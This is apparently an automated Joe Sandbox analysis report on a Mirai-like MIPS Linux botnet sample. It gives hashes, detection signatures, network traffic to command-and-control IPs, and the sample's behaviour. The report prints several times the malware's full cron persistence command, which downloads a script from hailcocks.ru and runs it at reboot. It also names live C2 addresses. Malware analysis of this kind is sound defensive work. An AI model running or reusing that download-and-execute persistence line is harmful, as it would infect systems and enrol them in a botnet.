Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshkmpsl.elf

Overview

General Information

Sample name:nshkmpsl.elf
Analysis ID:1577054
MD5:30a48987365bc904e7533728b701131b
SHA1:fea496a069a426941dd5c5ea267e03c476144537
SHA256:ca1d705cea9c1c5f4022ea41b25f087782b8d358a78b9a95ffb616b2f34a02a6
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1577054
Start date and time:2024-12-17 22:27:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshkmpsl.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@14/0
  • VT rate limit hit for: nshkmpsl.elf
Command:/tmp/nshkmpsl.elf
PID:6243
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nshkmpsl.elf (PID: 6243, Parent: 6167, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/nshkmpsl.elf
    • sh (PID: 6245, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6251, Parent: 6245)
        • sh New Fork (PID: 6253, Parent: 6251)
        • crontab (PID: 6253, Parent: 6251, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6252, Parent: 6245)
      • crontab (PID: 6252, Parent: 6245, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshkmpsl.elfReversingLabs: Detection: 15%
Source: tmp.b6zsnY.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 80.78.26.121 ports 16670,3030,2093,0,1,10328,6,7,16968
Source: global trafficTCP traffic: 212.64.215.71 ports 5591,17851,1,5,7,8,2616
Source: global trafficTCP traffic: 192.168.2.23:57570 -> 80.78.26.121:16670
Source: global trafficTCP traffic: 192.168.2.23:44970 -> 212.64.215.71:17851
Source: /tmp/nshkmpsl.elf (PID: 6243)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.b6zsnY.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@14/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6253)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6252)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6252)File: /var/spool/cron/crontabs/tmp.b6zsnYJump to behavior
Source: /usr/bin/crontab (PID: 6252)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshkmpsl.elf (PID: 6245)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshkmpsl.elf (PID: 6243)Queries kernel information via 'uname': Jump to behavior
Source: nshkmpsl.elf, 6243.1.000055561ab72000.000055561ac1b000.rw-.sdmp, nshkmpsl.elf, 6254.1.000055561ab72000.000055561ac1b000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: nshkmpsl.elf, 6243.1.000055561ab72000.000055561ac1b000.rw-.sdmp, nshkmpsl.elf, 6254.1.000055561ab72000.000055561ac1b000.rw-.sdmpBinary or memory string: VU!/etc/qemu-binfmt/mipsel
Source: nshkmpsl.elf, 6243.1.00007ffd6a594000.00007ffd6a5b5000.rw-.sdmp, nshkmpsl.elf, 6254.1.00007ffd6a594000.00007ffd6a5b5000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/nshkmpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkmpsl.elf
Source: nshkmpsl.elf, 6243.1.00007ffd6a594000.00007ffd6a5b5000.rw-.sdmp, nshkmpsl.elf, 6254.1.00007ffd6a594000.00007ffd6a5b5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577054 Sample: nshkmpsl.elf Startdate: 17/12/2024 Architecture: LINUX Score: 60 30 80.78.26.121, 10328, 16670, 16968 CYBERDYNELR Cyprus 2->30 32 kingstonwikkerink.dyn 212.64.215.71, 17851, 2616, 37992 RACKSPACE-LONGB Turkey 2->32 34 3 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nshkmpsl.elf 2->9         started        signatures3 process4 process5 11 nshkmpsl.elf sh 9->11         started        13 nshkmpsl.elf 9->13         started        15 nshkmpsl.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nshkmpsl.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.b6zsnY, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nshkmpsl.elf16%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
212.64.215.71
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.b6zsnY.18.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      80.78.26.121
      unknownCyprus
      37560CYBERDYNELRtrue
      212.64.215.71
      kingstonwikkerink.dynTurkey
      15395RACKSPACE-LONGBfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      80.78.26.121nshkmips.elfGet hashmaliciousUnknownBrowse
        nshkarm7.elfGet hashmaliciousUnknownBrowse
          nshkarm5.elfGet hashmaliciousUnknownBrowse
            nshkarm.elfGet hashmaliciousUnknownBrowse
              212.64.215.71nshkmips.elfGet hashmaliciousUnknownBrowse
                nshkarm7.elfGet hashmaliciousUnknownBrowse
                  nshkarm5.elfGet hashmaliciousUnknownBrowse
                    nshkarm.elfGet hashmaliciousUnknownBrowse
                      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                      91.189.91.43nshkmips.elfGet hashmaliciousUnknownBrowse
                        la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                            cmc.elfGet hashmaliciousUnknownBrowse
                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                  la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                      la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                        la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                          91.189.91.42nshkmips.elfGet hashmaliciousUnknownBrowse
                                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                cmc.elfGet hashmaliciousUnknownBrowse
                                                  la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                    la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                      la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                        la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                          la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                            la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              kingstonwikkerink.dynnshkmips.elfGet hashmaliciousUnknownBrowse
                                                              • 212.64.215.71
                                                              nshkarm7.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              nshkarm.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CANONICAL-ASGBnshkmips.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              cmc.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                              • 185.125.190.26
                                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              RACKSPACE-LONGBnshkmips.elfGet hashmaliciousUnknownBrowse
                                                              • 212.64.215.71
                                                              nshkarm7.elfGet hashmaliciousUnknownBrowse
                                                              • 212.64.215.71
                                                              nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                              • 212.64.215.71
                                                              nshkarm.elfGet hashmaliciousUnknownBrowse
                                                              • 212.64.215.71
                                                              i686.elfGet hashmaliciousMiraiBrowse
                                                              • 92.52.99.131
                                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 89.234.28.7
                                                              Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                              • 89.234.45.46
                                                              https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                                              • 134.213.193.62
                                                              meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                              • 134.213.250.148
                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 162.13.153.221
                                                              CYBERDYNELRnshkmips.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              nshkarm7.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              nshkarm.elfGet hashmaliciousUnknownBrowse
                                                              • 80.78.26.121
                                                              GjNVpV53SR.exeGet hashmaliciousQuasarBrowse
                                                              • 80.78.28.83
                                                              p-p.c-440.DUSK.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 185.193.127.129
                                                              PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
                                                              • 80.78.24.30
                                                              FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                              • 80.78.24.30
                                                              PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                              • 80.78.24.30
                                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 185.193.127.129
                                                              INIT7CHnshkmips.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              cmc.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              No context
                                                              No context
                                                              Process:/usr/bin/crontab
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):306
                                                              Entropy (8bit):5.164809466258272
                                                              Encrypted:false
                                                              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvmCUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXA:8QjHig8SxeHLUHYC+GABjnOGAFkz
                                                              MD5:B7457A6185A6526E08BF607B7C02B38E
                                                              SHA1:7087596124952856AF08CFFC2BEF2013A7556E52
                                                              SHA-256:AFE58449C2D404985FD915A288C1DCFB7E5EA6329347D5E31DD2099B8AC364FD
                                                              SHA-512:696B945226BFB919B4AD3261052D1D6350AFEFDA137DB953908A7FA0D53309327F5736094F2A01D113CAA5176E74EBEF6F8533ED4DED87D73413DCEFC02638FD
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 15:27:56 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                              File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                              Entropy (8bit):5.434450038083414
                                                              TrID:
                                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                              File name:nshkmpsl.elf
                                                              File size:101'604 bytes
                                                              MD5:30a48987365bc904e7533728b701131b
                                                              SHA1:fea496a069a426941dd5c5ea267e03c476144537
                                                              SHA256:ca1d705cea9c1c5f4022ea41b25f087782b8d358a78b9a95ffb616b2f34a02a6
                                                              SHA512:7a6e77bba1c6cf8a2e467971f1f4f0fd1ab20961fd599d1a10172cbf596dacee1609313e580704e632de16f6c63895c979ede3aa5fdf4bd2fba374636868e7d2
                                                              SSDEEP:1536:T76oUtVia0AvCIULeI6L/HzupBKS2gxMuhAYO4ZKze7aAy+viLPQEEj:T76oEVTVFCpBcgxMuhAYO4Mtoj
                                                              TLSH:E8A3E619FF510EFBDCAFCD3746A9070135DC551622A82B3A3974C928F64A14F5AE3C68
                                                              File Content Preview:.ELF....................`.@.4...........4. ...(...............@...@..t...t....................E...E.P....[..........Q.td...............................<\..'!......'.......................<8..'!... .........9'.. ........................<...'!............X9

                                                              ELF header

                                                              Class:ELF32
                                                              Data:2's complement, little endian
                                                              Version:1 (current)
                                                              Machine:MIPS R3000
                                                              Version Number:0x1
                                                              Type:EXEC (Executable file)
                                                              OS/ABI:UNIX - System V
                                                              ABI Version:0
                                                              Entry Point Address:0x400260
                                                              Flags:0x1007
                                                              ELF Header Size:52
                                                              Program Header Offset:52
                                                              Program Header Size:32
                                                              Number of Program Headers:3
                                                              Section Header Offset:101044
                                                              Section Header Size:40
                                                              Number of Section Headers:14
                                                              Header String Table Index:13
                                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                              NULL0x00x00x00x00x0000
                                                              .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                              .textPROGBITS0x4001200x1200x157f00x00x6AX0016
                                                              .finiPROGBITS0x4159100x159100x5c0x00x6AX004
                                                              .rodataPROGBITS0x4159700x159700x1b400x00x2A0016
                                                              .ctorsPROGBITS0x4580000x180000x80x00x3WA004
                                                              .dtorsPROGBITS0x4580080x180080x80x00x3WA004
                                                              .data.rel.roPROGBITS0x4580140x180140x100x00x3WA004
                                                              .dataPROGBITS0x4580300x180300x3c80x00x3WA0016
                                                              .gotPROGBITS0x4584000x184000x6500x40x10000003WAp0016
                                                              .sbssNOBITS0x458a500x18a500x2c0x00x10000003WAp004
                                                              .bssNOBITS0x458a800x18a500x51480x00x3WA0016
                                                              .mdebug.abi32PROGBITS0xcde0x18a500x00x00x0001
                                                              .shstrtabSTRTAB0x00x18a500x640x00x0001
                                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                              LOAD0x00x4000000x4000000x174b00x174b05.57370x5R E0x10000.init .text .fini .rodata
                                                              LOAD0x180000x4580000x4580000xa500x5bc83.72840x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 17, 2024 22:27:59.712315083 CET42836443192.168.2.2391.189.91.43
                                                              Dec 17, 2024 22:28:00.480070114 CET4251680192.168.2.23109.202.202.202
                                                              Dec 17, 2024 22:28:01.884537935 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.004436970 CET166705757080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:02.004782915 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.005096912 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.043239117 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.124633074 CET166705757080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:02.125017881 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.163393974 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:02.163940907 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.164285898 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.244915009 CET166705757080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:02.283963919 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:02.284286022 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:02.404162884 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:12.014254093 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:12.134676933 CET166705757080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:12.167601109 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:12.287369967 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:12.393228054 CET166705757080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:12.393537045 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:12.393891096 CET5757016670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:12.592978001 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:12.593372107 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:14.558058023 CET43928443192.168.2.2391.189.91.42
                                                              Dec 17, 2024 22:28:17.705403090 CET4497017851192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:28:17.825269938 CET1785144970212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:28:17.825440884 CET4497017851192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:28:17.825602055 CET4497017851192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:28:17.945173025 CET1785144970212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:28:17.945384979 CET4497017851192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:28:18.065277100 CET1785144970212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:28:20.137871027 CET1785144970212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:28:20.138433933 CET4497017851192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:28:20.264458895 CET1785144970212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:28:25.383876085 CET509702093192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:25.503614902 CET20935097080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:25.503879070 CET509702093192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:25.503967047 CET509702093192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:25.623697042 CET20935097080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:25.623984098 CET509702093192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:25.743688107 CET20935097080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:26.844391108 CET42836443192.168.2.2391.189.91.43
                                                              Dec 17, 2024 22:28:29.827332973 CET20935097080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:29.827708006 CET509702093192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:29.827780008 CET509702093192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:30.939846039 CET4251680192.168.2.23109.202.202.202
                                                              Dec 17, 2024 22:28:35.071871042 CET4902610328192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:35.191544056 CET103284902680.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:35.191673994 CET4902610328192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:35.191750050 CET4902610328192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:35.311389923 CET103284902680.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:35.311649084 CET4902610328192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:35.432894945 CET103284902680.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:55.512387991 CET43928443192.168.2.2391.189.91.42
                                                              Dec 17, 2024 22:28:57.094940901 CET103284902680.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:28:57.095277071 CET4902610328192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:28:57.214967966 CET103284902680.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:07.343822956 CET5340816968192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:07.463773012 CET169685340880.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:07.463952065 CET5340816968192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:07.464118958 CET5340816968192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:07.583709002 CET169685340880.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:07.583832026 CET5340816968192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:07.703424931 CET169685340880.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:29.376744032 CET169685340880.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:29.377487898 CET5340816968192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:29.497160912 CET169685340880.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:32.654987097 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:32.775687933 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:33.075376034 CET166705757280.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:29:33.075664043 CET5757216670192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:29:39.626303911 CET521205591192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:39.746031046 CET559152120212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:39.746272087 CET521205591192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:39.746350050 CET521205591192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:39.865895987 CET559152120212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:39.866229057 CET521205591192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:39.985862017 CET559152120212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:42.037775040 CET559152120212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:42.038136005 CET521205591192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:42.157778978 CET559152120212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:52.296303034 CET379922616192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:52.416450024 CET261637992212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:52.416579008 CET379922616192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:52.416666031 CET379922616192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:52.536501884 CET261637992212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:52.536720991 CET379922616192.168.2.23212.64.215.71
                                                              Dec 17, 2024 22:29:52.656501055 CET261637992212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:54.731055975 CET261637992212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:54.731436968 CET379922616192.168.2.23212.64.215.71
